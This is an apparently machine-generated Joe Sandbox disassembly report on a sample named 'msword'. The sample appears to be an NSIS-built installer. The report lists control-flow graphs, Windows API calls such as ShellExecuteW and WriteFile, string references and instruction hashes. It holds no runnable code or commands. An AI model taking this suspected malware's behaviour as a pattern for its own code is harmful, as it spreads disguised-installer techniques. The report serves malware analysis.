                                                                        control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                        • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                        • String ID:
                                                                        • API String ID: 2568930968-0
                                                                        • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                        • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                        Strings
                                                                        • TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770
                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                        • <RM>, xrefs: 00402713
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                        • String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
                                                                        • API String ID: 247603264-3745045155
                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                        APIs
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                        • API String ID: 3156913733-2180253247
                                                                        • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                        • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699
                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                        Similarity
                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                        • String ID: HideWindow
                                                                        • API String ID: 1249568736-780306582
                                                                        • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                        • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                        APIs
                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 3394109436-0
                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                        APIs
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID:
                                                                        • API String ID: 4115351271-0
                                                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                        • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                        • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                        • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                        • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                        • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                        • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                        • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                        • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                        • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                        • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                        • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                        • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $ @$M$N
                                                                        • API String ID: 1638840714-3479655940
                                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
